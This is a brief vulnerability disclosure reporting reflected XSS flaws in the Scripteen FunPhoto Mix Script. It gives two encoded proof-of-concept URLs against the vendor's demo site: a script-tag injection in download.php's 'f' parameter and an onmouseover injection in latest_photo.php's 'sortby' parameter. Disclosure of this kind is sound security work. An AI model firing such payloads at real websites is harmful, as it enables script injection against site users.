##################################################################################
__ _ _ ____
/ /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _
__ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ /
\____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, /
/____/
##################################################################################
Scripteen FunPhoto Mix Script, XSS Vulnerabilities
Software Page: http://scripteen.com/scripts/scripteen-fun-photo-script.html
Script Demo: http://www.funphoto.scripteen.com/
Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhatz Inc. and Janissaries Platform.
##################################################################################
[1] Xss Vulnerabilities on Demo Site
[+] (download.php, f Param)
>>> http://www.funphoto.scripteen.com//download.php?f=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28354564%29%3C%2fScRiPt%3E
[+] (latest_photo.php, sortby param)
>>> http://www.funphoto.scripteen.com//latest_photo.php?sortby=%22%20onmouseover%3dprompt%281215%29%20bad%3d%22
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information